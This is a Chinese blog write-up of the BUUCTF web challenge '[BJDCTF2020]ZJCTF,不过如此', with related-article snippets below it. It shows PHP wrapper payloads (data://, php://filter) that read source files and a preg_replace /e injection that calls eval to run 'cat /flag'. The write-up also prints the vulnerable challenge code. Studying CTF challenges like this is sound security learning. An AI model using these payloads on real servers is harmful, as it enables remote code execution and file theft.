BUUCTF-web类-[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量1.9k 收藏 2
点赞数 3
文章标签: php 安全 信息安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44622228/article/details/105644054
版权

BUUCTF-web类-[BJDCTF2020]ZJCTF,不过如此
在这里插入图片描述在这里插入图片描述
分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。
看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议
在这里插入图片描述
源码中提示我们去包含next.php文件,所以我们利用php://filter协议去读下next.php的源码。
在这里插入图片描述
于是构造payload

index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

在这里插入图片描述base64解码,得到next.php的源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

在这里没了思路,于是问了问大牛。
/e模式的preg_replace,有一个远程代码执行漏洞。
思路是利用这个代码执行,执行源码中的getFlag()函数,在传入cmd参数,再利用getFlag中的eval()函数,再进行一个代码执行。
俄罗斯套娃。

https://xz.aliyun.com/t/2557
这篇文章就是讲这个的利用的。

于是构造Payload:

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

得到flag。
在这里插入图片描述ctf路漫漫~

目标是成为神奇宝贝大师
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BJDCTF2020]ZJCTF不过如此
05-07 359
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
[BJDCTF2020]ZJCTF不过如此 简单思路及做法
EC_Carrot的博客
12-07 855
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
[BJDCTF2020]ZJCTF不过如此1
最新发布
m0_73673698的博客
06-17 993
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
BUUCTF [web专项39][BJDCTF2020]ZJCTF不过如此
yanglinchiji的博客
11-20 246
这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。在 PHP 中,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串中使用正则表达式搜索和替换指定的文本。`preg_replace` 函数返回一个替换后的字符串或数组。作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();( 开始定义一个捕获分组,并匹配其中的子表达式;
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码中仅包含 0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。我们先看第二个参数中的\1 ,\1实际上就是 \1,而 \1 在正则表达式中有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号中的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
[BJDCTF2020]ZJCTF不过如此1详解
2301_77451464的博客
04-16 368
preg_replace()的/e模式存在命令执行漏洞。(只要看到了上面这一行代码,就想到用payload:\S*=${phpinfo()})2.用php://filter构造伪协议。1.用data构造伪协议。
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
05-06
写题记录
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
俄罗斯套娃
04-17
俄罗斯套娃动作数据
[BUUCTF][BJDCTF2020]ZJCTF不过如此1(做题记录
qq_48597181的博客
04-05 772
作为正则表达式匹配条件的参数名且这个参数值为的"getFlag();参数名:cmd和需要php执行的代码所以构造id=1&\S*={${getFlag()}}&cmd=system('linux命令');PS:\S是什么意思?正则表达式\S匹配非空字符PS: 为什么用{${getFlag()}} 这个写法?会调用phpinfo()函数并试图将结果嵌入到字符串中。而如果使用phpinfo()函数,它不会自动嵌入到字符串中。(我在这试了好久TAT。
2020/7/15 - [BJDCTF2020]ZJCTF不过如此 - 伪协议、preg_replace /e模式命令执行
抒情诗
07-16 453
文章目录1.代码审计2.base后,再审计3.payload 根据开始的时候主页面给得php代码 1.代码审计 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_conten
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 588
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
web buuctf [BJDCTF2020]ZJCTF不过如此
weixin_44214568的博客
03-23 1979
考点:正则匹配; 正则-反向引用; preg_replace /e模式漏洞 1. 一路做buuctf下来, web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-CSDN博客 和这题的思路一样,不做赘述,主要是利用php伪协议 1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密) file=php://filter/read=convert..
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1106
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值